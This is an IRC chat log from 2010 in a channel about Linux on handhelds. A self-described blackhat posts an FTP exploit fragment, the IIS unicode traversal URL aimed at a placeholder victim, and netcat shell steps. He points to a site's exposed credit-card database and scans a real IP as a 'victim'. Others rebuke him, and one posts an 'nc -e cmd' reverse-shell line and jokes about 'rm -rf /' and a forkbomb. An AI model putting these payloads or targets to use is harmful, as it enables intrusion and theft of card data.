**** BEGIN LOGGING AT Sun Feb 14 02:59:57 2010
Feb 14 22:46:48 hello @ll
Feb 14 22:49:55 ph34R t3h 3v1|_ C0D3 :-E
Feb 14 22:50:01 evilcode, hellp
Feb 14 22:50:03 *hello
Feb 14 22:50:25 something wrong with me ?
Feb 14 22:57:11 hack chan ? or only talking chan ?
Feb 14 22:57:23 Belldandy, topic
Feb 14 22:57:57 hrm ...
Feb 14 22:58:07 evilcode, hack chan
Feb 14 22:58:24 not really
Feb 14 22:58:29 i don't see any hack here
Feb 14 22:58:38 and no source no sploits no shell lo
Feb 14 22:58:40 evilcode, try looking at the channel topic
Feb 14 22:58:40 lol
Feb 14 22:58:58 hackndev isn't for malicious hacking
Feb 14 22:58:59 handhelds ?
Feb 14 22:59:07 what this mean ?
Feb 14 22:59:12 "This project aims to bring usable Linux environment to handhelds that run Palm OS. Get started running Linux on your PDA or smartphone by downloading a bootpack!
Feb 14 22:59:16 "
Feb 14 22:59:25 enigme, hacking is nothing malicious ... and never was
Feb 14 22:59:45 ok nice
Feb 14 22:59:46 enigme, hacker is a person who understands computers well ...
Feb 14 22:59:54 u are a whitehat maybe lol :)
Feb 14 22:59:58 marex, this I know -- nobody else ever seems to, though :)
Feb 14 23:00:13 enigme, sadly that's true
Feb 14 23:00:17 it possible to run linux on PDA or SmartPhone ?
Feb 14 23:00:19 evilcode, what are you looking for ?
Feb 14 23:00:25 nothing special
Feb 14 23:00:32 evilcode, it is
Feb 14 23:00:50 marex u can run them in ?
Feb 14 23:01:06 evilcode, what do you mean by 'you can run them in' ?
Feb 14 23:01:15 you mean on the hardware ? yes ...
Feb 14 23:01:27 linux supports like 16 other platforms besides x86
Feb 14 23:01:29 marex ==> ( 00:00:23 ) ( evilcode ) it possible to run linux on PDA or SmartPhone ?
Feb 14 23:01:46 what about Hardware detection and drivers ?
Feb 14 23:02:10 alpha arm avr32 blackfin cris frv h8300 ia64 m32r m68k m68knommu microblaze mips mn10300 parisc powerpc s390 score sh sparc um x86 xtensa
Feb 14 23:02:36 sorry ... not 16, more ...
Feb 14 23:03:01 evilcode, on handhelds, no hardware detection happens ... and drivers are generic so they work platform-wise
Feb 14 23:04:22 ok ok
Feb 14 23:04:28 i'm trying to understand u
Feb 14 23:04:45 so i can run my linux on my smartphone 3D
Feb 14 23:05:05 and he can detect my materials
Feb 14 23:05:11 that's a good way
Feb 14 23:05:14 evilcode, generally yes
Feb 14 23:05:19 ok
Feb 14 23:05:33 it's not that easy, but generally yes
Feb 14 23:05:42 where are u from marex ?
Feb 14 23:05:50 Prague ?
Feb 14 23:05:53 Czech ?
Feb 14 23:06:14 evilcode, no ... don't try anything on this IP, you don't have the skills to damage this machine
Feb 14 23:06:23 lol
Feb 14 23:06:33 i'm not trying anything man be sure
Feb 14 23:06:34 trust me, it's secured well
Feb 14 23:06:37 i would like only
Feb 14 23:06:40 know
Feb 14 23:06:50 i'm trying some bots in my channels
Feb 14 23:07:00 evilcode, botnet ?
Feb 14 23:07:03 mapping and detecting Proxy's
Feb 14 23:07:13 :)
Feb 14 23:07:16 evilcode, btw. I'm not from prague, don't worry
Feb 14 23:07:17 not really a botnet
Feb 14 23:08:30 * marex thinks of rebooting into OpenBSD to make it 'easier' for hackers ;-)
Feb 14 23:08:47 driver detection can happen but there aren't really any busses to enumerate
Feb 14 23:08:56 lol
Feb 14 23:09:04 so kernel already knows what hardware it's running on from the machtype
Feb 14 23:09:10 this is the problem's the bus's
Feb 14 23:09:12 t:)
Feb 14 23:09:14 :)
Feb 14 23:09:21 what's the problem?
Feb 14 23:09:30 my bot are really stupid :)
Feb 14 23:09:32 lol
Feb 14 23:09:44 he give me this
Feb 14 23:09:57 Connectivity Test Detail : marex (vasut.kolej.mff.cuni.cz - 0 (Czech Republic))
Feb 14 23:09:58 lol
Feb 14 23:10:19 i need write some new lines to make it better lol
Feb 14 23:11:35 it can ping
Feb 14 23:12:18 no it's not only the ping
Feb 14 23:12:27 it a combined script for my bot
Feb 14 23:12:51 what does it do?
Feb 14 23:12:51 to detect proxy's Sock4 and sock5 then locality with all information possible
Feb 14 23:12:57 it looks like ping and rdns
Feb 14 23:13:08 ping through socks?
Feb 14 23:13:16 and after that i'll make nmap attach script to this bot to make scan for ports but need more time :)
Feb 14 23:13:48 it's pack code i'm writing
Feb 14 23:14:11 MSPLOIT + nmap + NC + c99 shell + unicode generator :)
Feb 14 23:14:24 it will be live CD :)
Feb 14 23:14:37 but i'm only in 30% of my project
Feb 14 23:14:46 so marex don't worry i'm not trying anything :)
Feb 14 23:14:52 nmap -P0 ---
Feb 14 23:14:52 Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-15 00:14 CET
Feb 14 23:14:53 All 1000 scanned ports on --- (---) are filtered
Feb 14 23:14:53 Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds
Feb 14 23:15:09 cool
Feb 14 23:15:16 nmaped :)
Feb 14 23:15:24 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Feb 14 23:15:24 connect=s.connect((sys.argv[1],21))
Feb 14 23:15:28 oups
Feb 14 23:15:29 sorry
Feb 14 23:15:30 happier? fine ...
Feb 14 23:15:32 unicode generator?
Feb 14 23:15:32 mistake
Feb 14 23:15:41 what's c99 shell?
Feb 14 23:15:46 yep :)
Feb 14 23:15:51 unicode generator
Feb 14 23:16:08 c99 shell it's a trojan to root some servers :)
Feb 14 23:16:14 evilcode, ah btw. I'm teaching administration of UNIX systems on local university :)
Feb 14 23:16:19 * enigme sighs
Feb 14 23:16:28 that's python?
Feb 14 23:16:30 marex, very nice :)
Feb 14 23:16:32 marex good to know this
Feb 14 23:16:37 marex, are you a professor?
Feb 14 23:16:43 anybody know clean way to open a server socket in wscript?
Feb 14 23:16:44 are u doctor ?
Feb 14 23:16:48 enigme, not yet
Feb 14 23:17:18 what's the unicode generator needed for?
Feb 14 23:17:22 tmzt sorry bro i'm blackhat
Feb 14 23:17:27 evilcode, btw. is argv really the argument passed to that program ?
Feb 14 23:17:27 don't use the clean ways :)
Feb 14 23:17:37 evilcode, from command line I mean ...
Feb 14 23:17:39 marex, I'll have to bother you for help -- I'm co-teaching a student-taught UNIX sysadmin course :)
Feb 14 23:17:53 I just want to make a ip to serial proxy
Feb 14 23:17:56 enigme, we're teaching OpenBSD here ... but you can try
Feb 14 23:18:03 marex what d u mean ? with my line ?
Feb 14 23:18:11 evilcode, yes
Feb 14 23:18:21 what's the problem with my lines ?
Feb 14 23:18:40 argv is right, argv(0) is the $0 or name of the program
Feb 14 23:18:51 I'm asking if you're doing the function call with that's passed to the program from command line without checking the input
Feb 14 23:19:09 he is
Feb 14 23:19:10 s/that/what/
Feb 14 23:19:15 lol
Feb 14 23:19:21 no it's an exploit
Feb 14 23:19:27 int(s) would be better
Feb 14 23:19:31 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Feb 14 23:19:31 connect=s.connect((sys.argv[1],21))
Feb 14 23:19:31 print "[x] Sending Shellcode..."
Feb 14 23:19:31 s.recv(1024)
Feb 14 23:19:36 an exploitable exploit, the best kind
Feb 14 23:19:40 it's crap ...
Feb 14 23:19:45 yeah lol
Feb 14 23:19:46 tmzt, hehehe :)
Feb 14 23:19:59 hmm not in
Feb 14 23:20:05 since it's a hostname
Feb 14 23:20:23 :)
Feb 14 23:20:35 don't worry about my code men
Feb 14 23:20:38 try good\0bad\0
Feb 14 23:20:49 that's why i'm evilcode :)
Feb 14 23:20:58 stupidcode
Feb 14 23:21:03 nah it's cool
Feb 14 23:21:04 tmzt, calm down
Feb 14 23:21:08 it's your toy
Feb 14 23:21:12 ???
Feb 14 23:21:15 sorry man
Feb 14 23:21:17 sorry
Feb 14 23:21:29 anyway thx for discussion
Feb 14 23:21:31 marex: yeah
Feb 14 23:21:51 evilcode, don't play with stuff you don't understand
Feb 14 23:22:00 evilcode, you're likely to get yourself into trouble
Feb 14 23:22:03 ok teacher
Feb 14 23:22:09 but i'm not playing
Feb 14 23:22:16 I think when I switch my router to linux and nl80211 firmware
Feb 14 23:22:17 i'm only showing u some lines
Feb 14 23:22:36 it's a payload from metasploit shell
Feb 14 23:22:41 you still haven't explained the unicode bit
Feb 14 23:22:42 shellcode
Feb 14 23:22:51 ok tmzt wait
Feb 14 23:22:55 i'll give u demo
Feb 14 23:23:38 * marex expects weird stuff to happen
Feb 14 23:25:32 here is some old example
Feb 14 23:25:35 * tmzt worries a little
Feb 14 23:25:38 it's a scriptkidding maybe
Feb 14 23:26:04 * marex h4Z 9R34+ p|-|34R!!!
Feb 14 23:26:37 here is it : => /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..>./winnt/system32/cmd.exe?
>/c+dir+c:\inetpub\wwwroot\***
Feb 14 23:26:48 IIS server
Feb 14 23:26:57 but it's really old
Feb 14 23:27:14 oh yay fpse
Feb 14 23:27:16 hm ... and what does it do ?
Feb 14 23:27:27 lists files
Feb 14 23:27:29 now it's not work in the IIS
Feb 14 23:27:41 but if u find exploitable IIS server
Feb 14 23:27:43 was that in a url?
Feb 14 23:27:49 IIS ? that microsoft webserver parody ?
Feb 14 23:27:52 u set only www.victime.com/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..>./winnt/system32/cmd.exe?
>/c+dir+c:\inetpub\wwwroot\***
Feb 14 23:28:14 net stop inetsrv
Feb 14 23:28:16 and u are root in system
Feb 14 23:28:21 u upload nc
Feb 14 23:28:33 netcat then u listen in port and u are in :)
Feb 14 23:28:44 winnt is 2000 or less
Feb 14 23:28:51 2000
Feb 14 23:29:10 so is that on a url?
Feb 14 23:29:17 and does fpse have to be installed?
Feb 14 23:29:25 fpse is msft's very own trojan
Feb 14 23:29:42 here is another worked example :)
Feb 14 23:29:42 they replaced it with indexing later
Feb 14 23:29:50 ==>http://www.hkstylesupply.com/photo/hkstylesupply.mdb
Feb 14 23:29:59 then msrpc because it's faster
Feb 14 23:30:01 u click and u will download credit card MDB :)
Feb 14 23:30:11 and then the power grid accidentally shorted out
Feb 14 23:30:18 and nobody saw it
Feb 14 23:30:26 because the bigscreens were busy rebooting
Feb 14 23:30:43 tmzt this is the c99shell picture => http://aknow.prevx.com/content/blog/c99_owned.jpg
Feb 14 23:30:50 that's somebody made a mistake
Feb 14 23:30:59 mdb shouldn't be in the data directory
Feb 14 23:31:22 :)
Feb 14 23:31:23 it's probably hosted and it was easier for them to use odbc file driver
Feb 14 23:31:46 some admins don't really do a good job in some servers :)
Feb 14 23:31:56 question might be how somebody knew the filename
Feb 14 23:32:07 since you wouldn't see the asp
Feb 14 23:32:20 coze it's an old rooted server
Feb 14 23:32:25 with c99 shell
Feb 14 23:33:35 someone have a good scanner here ?
Feb 14 23:33:38 nmap
Feb 14 23:33:41 or nessus ?
Feb 14 23:35:29 yea, why ?
Feb 14 23:35:43 what scanner u use marex ?
Feb 14 23:35:53 nmap
Feb 14 23:35:59 and netstat on the other side
Feb 14 23:36:09 ok
Feb 14 23:36:12 * Sleep_Walker uses HP, does it count?
Feb 14 23:36:17 and what linux os no ?
Feb 14 23:36:22 :)
Feb 14 23:36:32 * enigme chimes in with a vote for Fujitsu's scanners (ADF + flatbed :)
Feb 14 23:36:35 Sleep_Walker, hehe :)
Feb 14 23:36:50 darn, you beat me Sleep_Walker :)
Feb 14 23:36:52 * marex has HP with printer
Feb 14 23:37:15 evilcode, I don't get your last question
Feb 14 23:37:35 i need scan host maybe it's a IIS 4
Feb 14 23:37:46 or 6
Feb 14 23:38:00 i'll scan
Feb 14 23:38:38 ./showme -O -T4 -sS -vv 64.78.2.37/130
Feb 14 23:40:38 80/tcp open http Microsoft IIS webserver 6.0
Feb 14 23:40:46 OS details: Microsoft Windows 2003 Server SP1
Feb 14 23:40:52 this is a good victim :)
Feb 14 23:41:19 ok ppl it was really nice to talking to u
Feb 14 23:41:28 must go away now
Feb 14 23:41:31 I pity you ... really
Feb 14 23:41:36 maybe another day ......
Feb 14 23:41:40 or never
Feb 14 23:41:43 :)
Feb 14 23:41:49 enjoy the slammer
Feb 14 23:41:51 hrm ...
Feb 14 23:42:10 that was impressive...
Feb 14 23:46:15 mhm
Feb 14 23:46:45 * marex goes to break PXA3 probably ...
Feb 14 23:47:20 marex, your current irc client lacks useful keyboard shortcuts or you did have fun?
Feb 14 23:48:05 pxa3?
Feb 14 23:48:22 Sleep_Walker, I have all the shortcuts I need on my keyboard if you mean /kick /ban /kickban etc.
Feb 14 23:48:33 I have that logitech G15 with programmable keys
Feb 14 23:48:59 wow, ultimate op keyboard!
Feb 14 23:49:21 rm -rf / should be somewhere there too
Feb 14 23:49:28 forkbomb too
Feb 14 23:49:36 tmzt, pxa3, yes
Feb 14 23:50:08 * Sleep_Walker is street_walker with Netwalker :)
Feb 14 23:52:05 nc -e cmd marexip 1004
Feb 14 23:52:41 on marex side: nc -p 1004 well, .cmd
Feb 14 23:53:13 tmzt, what's that ?
Feb 14 23:53:31 deltree /s /windows
Feb 14 23:53:40 deltree /s /y /windows
Feb 14 23:53:48 deltree /s /y \windows
Feb 14 23:54:14 nc -e runs a process and attaches it to a socket
Feb 14 23:54:33 except that if you run it on your end the commands run on your end, not the target
Feb 14 23:54:51 normally it's used as a tiny telnetd by whitehats
Feb 14 23:55:11 so it's nc -p 23 -l -e sh
Feb 14 23:55:59 it's saved me a few times
Feb 14 23:56:06 nc itself is not evil
Feb 14 23:59:48 nc is great tool for creating P2P networks using shell scripts ;b
Feb 15 00:02:31 how is that?
Feb 15 00:14:49 tmzt, btw. what was your question about PXA3 ?
Feb 15 00:15:43 how do you intend to break it?
Feb 15 00:17:39 just using socket for commands opening sockets for data on demand
Feb 15 00:17:59 I did such script long time ago
Feb 15 00:18:22 unfortunately it wasn't used even by my friends :b
Feb 15 00:18:31 hmm I see
Feb 15 00:18:31 tmzt, hacking around SMEMC right now
Feb 15 00:18:43 what's smemc?
Feb 15 00:19:18 static memory controller
Feb 15 00:19:39 what are you doing? what hardware is this?
Feb 15 00:19:43 obsd port?
Feb 15 00:19:46 it basically drives everything memory mapped
Feb 15 00:19:48 no ... in linux
Feb 15 00:19:51 pxa3
Feb 15 00:20:01 interesting
Feb 15 00:20:05 that include the 3d chip?
Feb 15 00:20:23 what 3d chip ? no ...
Feb 15 00:20:23 and all soc periph space?
Feb 15 00:20:29 yes
Feb 15 00:20:32 what's the static memory?
Feb 15 00:20:38 3d chip in pxa3xx
Feb 15 00:20:47 there's nothing like that
Feb 15 00:20:49 it's documented on mvl website
Feb 15 00:21:01 it's not very powerful though
Feb 15 00:21:03 sorry
Feb 15 00:21:03 you mean GCU ?
Feb 15 00:21:06 2d and video
Feb 15 00:21:11 not 3d
Feb 15 00:21:17 GCU then ...
Feb 15 00:21:33 that's in 310 ... I have that one in LT
Feb 15 00:21:38 ah
Feb 15 00:21:42 lt
Feb 15 00:21:51 littleton
Feb 15 00:21:58 okay
Feb 15 00:22:14 I played around with that kernel to start a port for some weird phone
Feb 15 00:22:21 but they switched to ipaq later
Feb 15 00:22:27 ipaq codebase
Feb 15 00:25:45 littleton is pretty cool actually :)
Feb 15 00:57:17 well ... patches sent
**** ENDING LOGGING AT Mon Feb 15 02:59:57 2010